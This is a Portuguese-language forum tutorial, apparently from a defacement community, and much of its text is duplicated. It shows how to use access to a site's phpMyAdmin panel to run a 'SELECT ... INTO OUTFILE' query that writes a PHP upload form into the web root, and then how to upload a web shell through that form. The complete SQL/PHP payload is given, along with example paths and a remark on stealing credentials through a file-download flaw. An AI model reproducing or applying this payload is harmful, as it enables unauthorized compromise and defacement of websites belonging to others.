Antes de começar esse pequeno tutorial , ja vou dizendo que não é sempre que você vai conseguir upar shell com esse metodo '-' , a maioria das vezes o usuario do phpmyadmin não tem privilegios suficientes para criar um arquivo no diretorio do site.
Existem muitos metodos de ser obter a senha e o login do phpmyadmin a mais comum é explorando a falha conhecida como RFD (famosa "fopen") , nela o defacer faz download dos php's do site vulneravel.
Logado no phpmyadmin do site clique em SQL e digite:
no lugar de $path voce irar colocar o path onde se encontra o site , exe:
Linux: /home/mmxm/public_html/
Windows: C:\\mmxm\\htdocs\\
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Clique em executar.
Se o arquivo for criado sera exibido a seguinte mensagem:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
depois é so acessar o site , exe: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] , e upar a sua shell por esse form de upload
Existem muitos metodos de ser obter a senha e o login do phpmyadmin a mais comum é explorando a falha conhecida como RFD (famosa "fopen") , nela o defacer faz download dos php's do site vulneravel.
Logado no phpmyadmin do site clique em SQL e digite:
- Código:
SELECT '<?php echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\'; echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; @copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\']) ?>' INTO OUTFILE '$path/upload.php'
no lugar de $path voce irar colocar o path onde se encontra o site , exe:
Linux: /home/mmxm/public_html/
Windows: C:\\mmxm\\htdocs\\
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Clique em executar.
Se o arquivo for criado sera exibido a seguinte mensagem:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
depois é so acessar o site , exe: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] , e upar a sua shell por esse form de upload